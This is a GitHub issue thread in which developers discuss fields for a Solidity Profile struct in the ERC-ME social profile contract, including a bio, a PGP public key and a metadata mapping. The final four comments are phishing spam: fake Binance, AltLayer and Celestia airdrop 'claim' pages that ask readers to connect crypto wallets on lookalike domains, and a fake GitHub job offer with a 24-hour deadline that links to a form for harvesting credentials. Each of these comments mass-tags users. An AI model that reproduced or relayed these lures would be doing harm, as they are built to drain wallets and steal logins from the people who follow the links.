### ISSUE TITLE
What Should I Add To My Profile Struct?

### ISSUE THREAD

**Issue by ghiliweld** [ghiliweld/ERC-ME#2]
I'm looking for what other properties I should add to my **Profile** `struct` since the contract needs to be built to last or future-proof as I like to call it.

Here's what the `struct` looks like presently:
```
struct Profile {
        string name; // Must be unique
        string handle; // Must be unique
        uint32 followerCount;
        uint32 followingCount;
        uint[] public followers; // Tracks who is following this profile
        uint[] public following; // Tracks who this profile is following
        address createdBy;
        uint64 bornOn;
    }
```

What do you think I should add? Please comment below!

**Comment by ghiliweld** [comment]
@momothereal @CaudilloFranco Any ideas?

**Comment by ghiliweld** [comment]
I was thinking some sort of `bool` called `isSpecial` something sorta like verified profiles on Twitter and elsewhere but I'm not sure cause that kinda goes against the point of ERC-ME. I don't want a centralized authority (me) deciding who gets to be special or not.

Unless `isSpecial` where to be determined through some sort of calculation like the follower-to-following (F2F) ratio. Say for example if I had 100K followers but was only following 100 people, I think that's good enough to get special status. A disproportionate F2F ratio is usually sign of a celebrity account or at least a very popular one.

What do y'all think, would this ruin the fun for others if I introduced a property like this?

**Comment by aramperes** [comment]
If you go the ratio route, you'd probably better off letting this decision to Dapps. They can display a 'special flair' depending on stats if they want to, but it doesn't have to be part of the contract specification.

**Comment by aramperes** [comment]
I think a 'bio' string, and possibly a 'website' string, would be nice.

**Comment by ghiliweld** [comment]
Good thinking, I think I'll go with `bio`. If I do decide to add `isSpecial` I will make it part of the contract because if you're verified or wtv you should be able to bring that stat to other Dapps. It make everything more connected you dig?

**Comment by aramperes** [comment]
Yeah I get why the flair can be part of the contract specification. I'm just thinking the follower/following ratio entirely depends on the platform and the amount of profiles you end up having in total. At the start, you're going to have 10-100 profiles, so it's going to be a very long time until anyone get's a flair :^)

Also, can I suggest having a string for public GPG key (`gpg_public_key`)? If this is added, it would be immensely useful to verify if the actual person behind the profile wrote a message and whatnot. This would be a very cool feature for a platform like this.

**Comment by aramperes** [comment]
Also, I'm not sure the `bornOn` field is very important. You might end up having corporate profiles. Maybe have a `dateCreated` field for the creation of the profile? (I don't know if that's technically possible here though)

**Comment by CaudilloFranco** [comment]
Personally, I think I can see some abuse of the `isSpecial` flair. There are a lot of bots, followback accounts, etc. so I think if there were to be verified accounts like Twitter has, then some proof or documentation is needed to show that x is really x.


But considering the fact that you'd not want to have any authority, don't think you should add it in at all.


Also, @momothereal,  `bornOn` *is* the date the account was created, not the date of birth, if I'm understanding you correctly.

**Comment by aramperes** [comment]
Yeah, I agree with @CaudilloFranco. I think proof-of-life, anti-spam and other verification measures are better in the hands of the Dapps.

**Comment by ghiliweld** [comment]
Alright, the I guess there won't be any `isSpecial` flair. `bornOn` refers to the date the profile is created. It's not manually entered but instead generated during the creation of the profile instantly and recorded to the blockchain. In other words, `bornOn` and `dateCreated` are the same thing and yes it is possible to do so through the `now` keyword available in Solidity (used for timestamping).

Thanks guys that helped a lot. Keep those suggestions coming b.

**Comment by aramperes** [comment]
Alright. I suggest switching `bornOn` to `dateCreated`, I think it's more clear.

**Comment by ghiliweld** [comment]
Ayt I'll do that then.

**Comment by ghiliweld** [comment]
Btw @momothereal wtf is a public GPG key? Engrishu prease!

**Comment by CaudilloFranco** [comment]
From a quick google: https://www.gnupg.org/ seems like it's a decryption device?

**Comment by aramperes** [comment]
@ghiliweld It would mean having a field to store a user's public key, used for encryption, as explained in my Cryptography article. GPG is a widespread specification set and tool to create and use asymmetric encryption.

**Comment by ghiliweld** [comment]
But why? And if you wanna know the public key (aka address) of whoever owns the profile then there's a mapping for that. `mapping (uint256 => address) public profileIndexToOwner;`

**Comment by aramperes** [comment]
PGP is the proper term, sorry. GPG is just the open-source implementation (by the GNU foundation).

Address != public key. The public key can be used to check if someone really sent a message, and in general, each person owns 'one public key and one private key'.

Let's say I want to make an announcement on Twitter that says 'yo fams im going at x in two hours'. I can create a signature of that message using my private key, and send it with the message:

```
@momotherealdev:
yo fams ill be at x in two hours
signature: 0F98986EFAD9875FAB0971
```

By giving my public key to everyone, people can check if the signature corresponds to my message. The old fashion way of distributing this key is by putting it on your website or other profile, or `keybase.io` for example. **But these systems/profiles can be compromised, and they are centralized.** Your website can be hacked. By putting the key on the blockchain, you can ensure the public key won't be tampered with.

So, you'd be able to just give people your ERC-ME profile address, and they can get your public key, and check if the signature matches the message.

**Comment by ghiliweld** [comment]
Oh, ok. How do I implement this? I'm not sure if there's a function to randomly generate public keys like that. I gotta dip but I'll look into it when I'm back.

**Comment by CaudilloFranco** [comment]
It's clearly gonna need Math.rundom

**Comment by ghiliweld** [comment]
But Math.random doesn't mix letters too. A public key contains letters as well.

**Comment by CaudilloFranco** [comment]
I know haha

**Comment by CaudilloFranco** [comment]
Found a juicy thread: https://forum.ethereum.org/discussion/2166/signature-generation-and-verification-in-solidity

**Comment by aramperes** [comment]
It doesn't have to be a thing generated by the contract, it can be supplied when the profile is created by the user (or changed later). Just accept it as a string. Is there a byte-array type in sol?

Public keys aren't random, they are generated with a corresponding private key by an algorithm (e.g. DSA or RSA) using a CLI tool like gpg.

**Comment by ghiliweld** [comment]
There is a byte-array type I believe. Tbh I looked into it but I still have no clue how I would implement this code-wise. Also, I'm not entirely sure of the benefit. What would be the problem exactly if there was no signature with the message? Is it possible that somebody writes a message that isn't by us and pretends to be us or something?

**Comment by aramperes** [comment]
The point isn't to use the key in any way in the context of the contract, but rather to allow users to tie their public key to their ERC-ME profile. They probably already use the signing process and already possess a key pair. However, users of the signing system need a way to distribute their public key.

Right now, people put their public keys on their website, bios, send by email, whatever. But these places aren't secure and they are centralized. I think we can take advantage of the ERC-ME system to allow users to store the key on the blockchain, tied to their profile.

I was also thinking about a new possible Profile property: `metadata`, a string->string mapping that allows Dapps or users to store additional data on their profile. Let's say a Dapp (example: my_dapp) wants to store/show a user's website URL, but the contract doesn't have this field: they can store this info in the metadata mapping with a key like `my_dapp:website`.

**Comment by ghiliweld** [comment]
That metadata idea sounds dope!

**Comment by ghiliweld** [comment]
In that case, shouldn't we include `bio` in our `metadata` mapping?
Ex:
```
mapping(string => string) public metadata;
metadata["bio"] = "This is my bio.";
metadata["website"] = "https://ghiliweld.github.io/";
```

**Comment by aramperes** [comment]
You could, but I think it should be kept for dapp-specific values. Bio can be a very broad thing. But for example, the isSpecial flair could be stored by dapps that offer verification in the mapping.

**Comment by CaudilloFranco** [comment]
Sam brings up a good point on the group chat. "How can the user change their data if the contract can’t be altered"

**Comment by aramperes** [comment]
The data can be changed by calling the appropriate functions (`changeHandle`, `editBio`, etc.)

The source address can only edit their own profile (the profile matching their own address)

Calling these functions would cost gas to the user/dapps obviously.

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @zabeth129, @jintao-zero, @xl9211, @jamesmorgan, @tyleryasaka, @tacshi, @ig0r, @zeyaddeeb, @NguyenTrinh, @jnkn6, @ricardoalmeida, @yodancristino, @emer111, @2020-io, @gotnoshoeson, @alisinabh, @khbw, @jojorb, @Muatann, @riffus, @AlexMikhalev, @qhxin, @NikolaRusakov, @IsAmrish, @cubical8569, @raphaelts3, @un-focused, @lokeshj, @clearloop, @sonirico, @BaCoNL, @iliazintchenko, @terorie, @0xNL, @abc0xmattyic333, @nickpoorman, @legua25, @fiahil, @autsada, @haowang1013, @banianxd, @Staszek-org, @pyadav, @andyluss, @Alejandrorosedatorres, @itsdaiego, @s1na, @smhmayboudi, @joglea, @brucx

**Comment by gis-gmd** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayercommunity.online/XY2wna)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others
  - Ethereum Mainnet
  - Binance Mainnet

For detailed criteria and information, check the full announcement [here](http://go.altlayercommunity.online/XY2wna).

[Claim Airdrop Altlayer](http://go.altlayercommunity.online/XY2wna) opens from January 25 to February 03, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
jimmyken793, @sebasa, @aoudiamoncef, @zhanggui1024, @kels-code, @alexanderkoh, @is44c, @mohamadbastin, @niikkiin, @nathan-culley, @subinium, @Wiles1, @0xtaosu, @dnazer, @vjgaur, @shardulshinde, @alvinnyen, @heyitsch, @mackgr, @yannickschuchmann

**Comment by Ripon9898** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
osdio, @Ninja-mann, @GeemoCandama, @0xCookedRice, @exdx, @pyropy, @pacovilletard, @EnormousCloud, @charmful0x, @Martin-57blocks, @sprtd, @NikitosnikN, @mariolaurore, @leon0x01, @pfefar, @clabby, @abdulsamijay, @Jackneill, @cotoneum, @MakisChristou

**Comment by freshy969** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!clearloop, @leovct, @jmcph4, @b0xtch, @Jackneill, @GrapeBaBa, @Stanback, @Ebolon, @trevorgjohnson, @CJ13th, @panther99, @spartucus, @CactusByte, @RiccardoBiosas, @ersoyfilinte, @KABBOUCHI, @lekhovitsky, @codewithgun, @miohtama, @ekrenzke
